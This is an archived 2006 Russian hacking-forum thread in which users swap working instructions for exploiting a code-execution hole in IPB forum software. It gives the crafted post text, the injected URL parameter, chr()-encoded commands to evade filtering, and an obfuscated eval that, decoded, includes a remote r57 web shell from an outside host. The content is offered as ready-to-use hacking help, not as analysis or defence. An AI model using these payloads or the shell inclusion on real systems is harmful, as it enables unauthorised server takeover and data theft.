ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.05.2006, 16:22
|
|
Познающий
Регистрация: 03.04.2006
Сообщений: 31
Провел на форуме:
175806
Репутация:
14
|
|
а ты про это? да я это юзал и щас юзаю тему четал самого начала так что я прсто не понял очень он говарит думал что что то новенькое ивени.
|
|
|
03.05.2006, 21:36
|
|
Новичок
Регистрация: 11.03.2006
Сообщений: 16
Провел на форуме:
22629
Репутация:
2
|
|
Сообщение от Azazel
Для тех у кого не получается со сплойтом, опишу как пользоваться ручками.
1. Постим сообщение eval(system(dir)); //'
2. В поиске ищем по своему нику все сообщения и не забываем поставить галочку на Show results as posts
3. В конце url дописываем &lastdate=z|eval.*?%20//)%23e%00
4. Enter. Выполняется dir.
Вставляю в сообщение eval(system(ls)); //' , выдаёт, как и надо, файлы на сервере, делаю eval(system(id)); //', работает, вообще, работают все команды из одного слова. Но когда пробую например ls -la, или which wget, то пишет ошибку. Но тогда и шелл нельзя залить... Что я делаю не так?
|
|
|
|
04.05.2006, 11:34
|
|
Новичок
Регистрация: 16.11.2004
Сообщений: 29
Провел на форуме:
47488
Репутация:
-2
|
|
Попробуй кодирование команд, например eval(system(chr(108).chr(115).chr(32).chr(45).chr( 108).chr(97)).chr(59).exit());//
|
|
|
|
04.05.2006, 11:37
|
|
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762
Репутация:
-1
|
|
Сообщение от TRes
Может я дурак, но кроме phpinfo() ничего не выполняется  положительный результат есть у кого? а какие команды вобще существуют
и где можно почитать об них
|
|
|
|
04.05.2006, 11:48
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Попробуй кодирование команд, например eval(system(chr(108).chr(115).chr(32).chr(45).chr( 108).chr(97)).chr(59).exit());//
Именно так и надо. Странно, в топике уже про это писали, а вопросы всё возникают. В видео тоже кто-то так делал и ссылку выкладывал.
а какие команды вобще существуют и где можно почитать об них
1. http://forum.antichat.ru/thread7345.html
2. Поиск по форуму.
3. Google.ru
|
|
|
|
04.05.2006, 15:47
|
|
Новичок
Регистрация: 22.04.2006
Сообщений: 20
Провел на форуме:
92091
Репутация:
5
|
|
Код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Include шелла RST. С ним все что угодно сделаете  |
|
|
|
05.05.2006, 21:35
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Тема выполнения произвольного кода на ИПБ закрыта. Всё что нужно для взлома в теме описано. Всё остальное в гугле. Ура!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
